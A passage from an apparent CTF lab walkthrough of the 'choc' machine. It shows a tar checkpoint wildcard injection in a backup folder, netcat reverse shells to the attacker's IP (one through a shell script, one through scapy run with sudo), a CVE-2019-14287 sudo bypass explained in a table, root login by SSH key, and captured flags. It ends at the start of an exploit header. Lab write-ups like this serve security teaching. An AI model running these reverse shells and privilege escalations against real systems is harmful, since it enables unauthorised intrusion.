.selected_editor\ndrwx------ 2 torki torki 4096 Apr 12  2021 .ssh<\/code><\/pre>\n<h3>Privilege Escalation via Insecure tar Behavior<\/h3>\n<p>Judging by the name it looks like a backup script; check where the backup file is:<\/p>\n<pre><code class=\"language-bash\">(remote) 
carl@choc:\/home\/torki$ find \/ -user torki 2&gt;\/dev\/null            \n\/home\/torki\n\/home\/torki\/.profile\n\/home\/torki\/.selected_editor\n\/home\/torki\/secret_garden\n\/home\/torki\/secret_garden\/diary.txt\n\/home\/torki\/.bash_logout\n\/home\/torki\/.bashrc\n\/home\/torki\/.gnupg\n\/home\/torki\/.local\n\/home\/torki\/.local\/share\n\/home\/torki\/.ssh\n\/home\/torki\/backup.sh\n\/tmp\/backup_home.tgz<\/code><\/pre>\n<p>Check whether our user has any unusual writable directories:<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/tmp$ find \/ -type d -writable 2&gt;\/dev\/null\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1002.slice\/user@1002.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1002.slice\/user@1002.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1002.slice\/user@1002.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1002.slice\/user@1002.service\/init.scope\n\/home\/torki\/secret_garden\n\/home\/carl\n\/home\/carl\/.gnupg\n\/home\/carl\/.gnupg\/private-keys-v1.d\n\/home\/carl\/.local\n\/home\/carl\/.local\/share\n\/home\/carl\/.local\/share\/nano\n\/home\/carl\/.ssh\n\/var\/tmp\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.ICE-unix\n\/tmp\/.X11-unix\n\/tmp\/.Test-unix\n\/tmp\/.XIM-unix\n\/proc\/1589\/task\/1589\/fd\n\/proc\/1589\/fd\n\/proc\/1589\/map_files\n\/run\/user\/1002\n\/run\/user\/1002\/gnupg\n\/run\/user\/1002\/systemd\n\/run\/lock\n\/dev\/mqueue\n\/dev\/shm<\/code><\/pre>\n<p>We actually have write permission in this backup directory; does that mean the next exploitation step revolves around this compressed backup operation....<\/p>\n<p>Write an arbitrary file into it and see what changes:<\/p>\n<pre><code class=\"language-bash\">(remote) 
carl@choc:\/home\/torki\/secret_garden$ ls -la \/tmp\/backup_home.tgz \n-rw-r--r-- 1 torki torki 10240 Jun 14 10:31 \/tmp\/backup_home.tgz\n(remote) carl@choc:\/home\/torki\/secret_garden$ echo &#039;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&#039; &gt; temp\n(remote) carl@choc:\/home\/torki\/secret_garden$ ls -la \/tmp\/backup_home.tgz                  \n-rw-r--r-- 1 torki torki 10240 Jun 14 10:32 \/tmp\/backup_home.tgz\n(remote) carl@choc:\/home\/torki\/secret_garden$ ls -la \/tmp\/backup_home.tgz \n-rw-r--r-- 1 torki torki 10240 Jun 14 11:10 \/tmp\/backup_home.tgz<\/code><\/pre>\n<p>This indicates that it does not compress the whole directory, only individual files.<\/p>\n<blockquote>\n<p>References:<\/p>\n<ul>\n<li><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/tar\/\">https:\/\/gtfobins.github.io\/gtfobins\/tar\/<\/a><\/li>\n<li><a href=\"https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/wildcards-spare-tricks.html?highlight=tar#tar\">https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/wildcards-spare-tricks.html?highlight=tar#tar<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>Try to execute commands through the insecure <code>tar<\/code> configuration...<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/torki\/secret_garden$ touch -- &quot;--checkpoint=1&quot;\n(remote) carl@choc:\/home\/torki\/secret_garden$ touch -- &quot;--checkpoint-action=exec=sh shell.sh&quot;\n(remote) carl@choc:\/home\/torki\/secret_garden$ echo &quot;nc -e \/bin\/bash 192.168.10.102 2345&quot; &gt; shell.sh\n(remote) carl@choc:\/home\/torki\/secret_garden$ chmod +x shell.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329097.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329097.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614171906332\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Python Reverse Shell<\/h3>\n<pre><code class=\"language-bash\">(remote) torki@choc:\/home\/torki\/secret_garden$ ls -la\ntotal 20\ndrwxrwxrwx 2 torki torki 4096 Jun 14 11:18  .\ndrwxr-xr-x 6 torki torki 4096 Apr 19  2021  ..\n-rw-r--r-- 1 carl  carl     0 Jun 14 11:18 &#039;--checkpoint=1&#039;\n-rw-r--r-- 1 carl  carl     0 Jun 14 11:18 &#039;--checkpoint-action=exec=sh shell.sh&#039;\n-rw-r--r-- 1 torki torki  325 Apr 20  2021  diary.txt\n-rwxr-xr-x 1 carl  carl    36 Jun 14 11:18  shell.sh\n-rw-r--r-- 1 carl  carl    32 Jun 14 10:31  temp\n(remote) torki@choc:\/home\/torki\/secret_garden$ cd ..\/\n(remote) torki@choc:\/home\/torki$ ls -la\ntotal 44\ndrwxr-xr-x 6 torki torki 4096 Apr 19  2021 .\ndrwxr-xr-x 5 root  root  4096 Apr 18  2021 ..\n-rwx------ 1 torki torki   71 Apr 18  2021 backup.sh\nlrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 torki torki  220 Apr 12  2021 .bash_logout\n-rw-r--r-- 1 torki torki 3526 Apr 12  2021 .bashrc\ndrwx------ 3 torki torki 4096 Apr 12  2021 .gnupg\ndrwxr-xr-x 3 torki torki 4096 Apr 18  2021 .local\n-rw-r--r-- 1 torki torki  807 Apr 12  2021 .profile\ndrwxrwxrwx 2 torki torki 4096 Jun 14 11:18 secret_garden\n-rw-r--r-- 1 torki torki   66 Apr 18  2021 .selected_editor\ndrwx------ 2 torki torki 4096 Apr 12  2021 .ssh\n(remote) torki@choc:\/home\/torki$ cat bashup.sh \ncat: bashup.sh: No such file or directory\n(remote) 
torki@choc:\/home\/torki$ cat backup.sh \n#!\/bin\/bash\ncd \/home\/torki\/secret_garden\ntar cf \/tmp\/backup_home.tgz *\n(remote) torki@choc:\/tmp$ sudo -l\nUser torki may run the following commands on choc:\n    (sarah) NOPASSWD: \/usr\/bin\/scapy\n(remote) torki@choc:\/tmp$ \/usr\/bin\/scapy\nWARNING: Cannot read wireshark manuf database\nINFO: Can&#039;t import matplotlib. Won&#039;t be able to plot.\nINFO: Can&#039;t import PyX. Won&#039;t be able to use psdump() or pdfdump().\nWARNING: Failed to execute tcpdump. Check it is installed and in the PATH\nINFO: Can&#039;t import python-cryptography v1.7+. Disabled WEP decryption\/encryption. (Dot11)\nINFO: Can&#039;t import python-cryptography v1.7+. Disabled IPsec encryption\/authentication.\nWARNING: IPython not available. Using standard Python shell instead.\nAutoCompletion, History are disabled.\n\n                     aSPY\/\/YASa       \n             apyyyyCY\/\/\/\/\/\/\/\/\/\/YCa       |\n            sY\/\/\/\/\/\/YSpcs  scpCY\/\/Pp     | Welcome to Scapy\n ayp ayyyyyyySCP\/\/Pp           syY\/\/C    | Version 2.4.0\n AYAsAYYYYYYYY\/\/\/Ps              cY\/\/S   |\n         pCCCCY\/\/p          cSSps y\/\/Y   | https:\/\/github.com\/secdev\/scapy\n         SPPPP\/\/\/a          pP\/\/\/AC\/\/Y   |\n              A\/\/A            cyP\/\/\/\/C   | Have fun!\n              p\/\/\/Ac            sC\/\/\/a   |\n              P\/\/\/\/YCpc           A\/\/A   | Craft packets like I craft my beer.\n       scccccp\/\/\/pSP\/\/\/p          p\/\/Y   |               -- Jean De Clerck\n      sY\/\/\/\/\/\/\/\/\/y  caa           S\/\/P   |\n       cayCyayP\/\/Ya              pY\/Ya\n        sY\/PsY\/\/\/\/YCc          aC\/\/Yp \n         sc  sccaCY\/\/PCypaapyCP\/\/YSs  \n                  spCPY\/\/\/\/\/\/YPSps    \n                       ccaacs         \n\n>&gt;&gt; <\/code><\/pre>\n<p>A quick test then shows it is just a Python environment:<\/p>\n<pre><code class=\"language-bash\">>&gt;&gt; 
print(1)\n1\n>&gt;&gt; <\/code><\/pre>\n<p>Just try a reverse shell.....<\/p>\n<pre><code class=\"language-bash\">>&gt;&gt; import os;\n>&gt;&gt; os.system(&quot;nc -e \/bin\/bash 192.168.10.102 3456&quot;)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329098.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329098.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614172854941\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329099.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329099.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614172919152\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Privilege escalation to root<\/h3>\n<pre><code class=\"language-bash\">(remote) sarah@choc:\/home\/sarah$ ls -la\ntotal 48\ndrwxrwx--- 5 sarah torki 4096 Apr 20  2021 .\ndrwxr-xr-x 5 root  
root  4096 Apr 18  2021 ..\nlrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -&gt; \/dev\/null\n-rwxrwxr-- 1 sarah sarah  220 Apr 12  2021 .bash_logout\n-rwxrwxr-- 1 sarah sarah 3557 Apr 20  2021 .bashrc\ndrwx------ 3 sarah sarah 4096 Apr 19  2021 .gnupg\ndrwxrwx--- 3 sarah sarah 4096 Apr 19  2021 .local\n-rwx------ 1 sarah sarah   13 Apr 20  2021 .note.txt\n-rwxrwxr-- 1 sarah sarah  808 Apr 19  2021 .profile\n-rw-r--r-- 1 sarah sarah  444 Apr 19  2021 quotes.txt\n-rw-r--r-- 1 sarah sarah   66 Apr 19  2021 .selected_editor\ndrwx------ 2 sarah sarah 4096 Apr 20  2021 .ssh\n-rwx------ 1 sarah sarah   13 Apr 18  2021 user.txt\n(remote) sarah@choc:\/home\/sarah$ cat user.txt \ncommenquaded\n(remote) sarah@choc:\/home\/sarah$ sudo -l\nUser sarah may run the following commands on choc:\n    (ALL, !root) NOPASSWD: \/usr\/bin\/wall<\/code><\/pre>\n<p>wall is a messaging tool that delivers a message to users:<\/p>\n<pre><code class=\"language-bash\">(remote) sarah@choc:\/home\/sarah$ cat .note.txt \nfuckmeplease\n(remote) sarah@choc:\/home\/sarah$ cat quotes.txt \n\n \u201cYou must have chaos within you to give birth to a dancing star.\u201d \n\n \u201cIt is not a lack of love, but a lack of friendship that makes unhappy marriages.\u201d \n\n \u201cThe multiplication of our kind borders on the obscene; the duty to love them, on the preposterous.\u201d \n\n\u201cWe do not die because we have to die; we die because one day, and not so long ago, our consciousness was forced to deem it necessary.\u201c\n\n\u201cLuke, I am your father&quot;\n\n(remote) sarah@choc:\/home\/sarah$ cd .local\n(remote) sarah@choc:\/home\/sarah\/.local$ ls -la\ntotal 3024\ndrwxrwx--- 3 sarah sarah    4096 Apr 19  2021 .\ndrwxrwx--- 5 sarah torki    4096 Apr 20  2021 ..\n-rwxr-xr-x 1 sarah sarah 3078592 Mar 14  2021 pspy64\n-rwxrwxrwx 1 sarah sarah      42 Apr 19  2021 script.sh\ndrwxrwx--- 3 sarah sarah    4096 Apr 12  2021 
share\n(remote) sarah@choc:\/home\/sarah\/.local$ cat script.sh \n#!\/bin\/bash\n\ncat \/home\/sarah\/quotes.txt \n(remote) sarah@choc:\/home\/sarah\/.local$ whereis sudo\nsudo: \/usr\/local\/bin\/sudo\n(remote) sarah@choc:\/home\/sarah\/.local$ \/usr\/local\/bin\/sudo -V\nSudo version 1.8.23\nSudoers policy plugin version 1.8.23\nSudoers file grammar version 46\nSudoers I\/O plugin version 1.8.23<\/code><\/pre>\n<p>Note that the odd <code>sudo<\/code> location noticed earlier turned out to play no role; the issue to exploit here is CVE-2019-14287:<\/p>\n<p><strong>The sudo version is lower than 1.8.28<\/strong> (the version that fixes the vulnerability).<\/p>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\"><strong>UID value<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>Expected identity<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>Actual identity<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>Result<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><code>-u#1000<\/code><\/td>\n<td style=\"text-align: center;\">Regular user<\/td>\n<td style=\"text-align: center;\">User 1000<\/td>\n<td style=\"text-align: center;\">Runs normally<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>-u#0<\/code><\/td>\n<td style=\"text-align: center;\">root<\/td>\n<td style=\"text-align: center;\">root<\/td>\n<td style=\"text-align: center;\">Explicitly denied by the configuration<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>-u#-1<\/code> or <code>4294967295<\/code><\/td>\n<td style=\"text-align: center;\">Unknown<\/td>\n<td style=\"text-align: center;\"><strong>root<\/strong><\/td>\n<td style=\"text-align: 
center;\"><strong>Restriction bypassed, privilege escalation succeeds<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<pre><code class=\"language-bash\">(remote) sarah@choc:\/tmp$ mesg\nis y<\/code><\/pre>\n<p>A second terminal is also needed, logged in as <code>carl<\/code>:<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/carl$ mesg\nis y<\/code><\/pre>\n<p>Then try to broadcast:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329100.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614175726232\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>But on my side it kept failing, and I do not know why.....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329101.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329101.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614211154662\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329102.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329102.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614211204503\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>And my Kali cannot run wall either!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329103.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329103.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"9e78552092f5dd5242595d0d7224b0ec\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329104.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329104.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Then I asked the group owner for help:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329105.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329105.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614212116172\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>So I switched to another Kali, one I had nearly wrecked earlier while setting up environments, and there it runs normally:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329106.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329106.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614212018887\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>But it shows:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329107.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329107.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614214904922\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<p>Still not working, I am really about to lose it, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!!!!!!!!!!!!!!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329108.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329108.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614224040949\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329109.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329109.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614224054119\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Never mind, time for overkill: attack through some other vulnerability, damn it!!!!! OK, I could not find any vulnerabilities that actually work..... Anyway, the above is the intended solution, so in the end I just copied from the blog of \u5de8\u9b54\u5e08\u5085....<\/p>\n<pre><code class=\"language-bash\">-----BEGIN OPENSSH PRIVATE 
KEY-----\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Then I got the flag......<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Choc]\n\u2514\u2500$ chmod 600 root    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh root@192.168.10.103 -i root\n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\nLinux choc 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Thu Apr 22 20:20:23 2021\nroot@choc:~# ls -la\ntotal 44\ndrwx------  5 root root 4096 Apr 20  2021 .\ndrwxr-xr-x 19 root root 4096 Apr 18  2021 ..\nlrwxrwxrwx  1 root root    9 Apr 20  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 Apr 12  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 Apr 12  2021 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root   10 Apr 18  2021 r00t.txt\n-rw-r--r--  1 root root   66 Apr 19  2021 .selected_editor\ndrwx------  2 root root 4096 Apr 20  2021 .ssh\n-rw-r--r--  1 root root  202 Apr 18  2021 .wget-hsts\n-rw-------  1 root root   52 Apr 15  2021 .Xauthority\nroot@choc:~# cat r00t.txt \ninesbywal<\/code><\/pre>\n<h2>CVE-2019-14287<\/h2>\n<pre><code class=\"language-bash\"># Exploit Title : sudo 1.8.27 - Security Bypass\n# Date : 2019-10-15\n# Original Author: Joe Vennix\n# Exploit Author : Mohin Paramasivam (Shad0wQu35t)\n# Version : Sudo &lt;1.8.28\n# Tested on 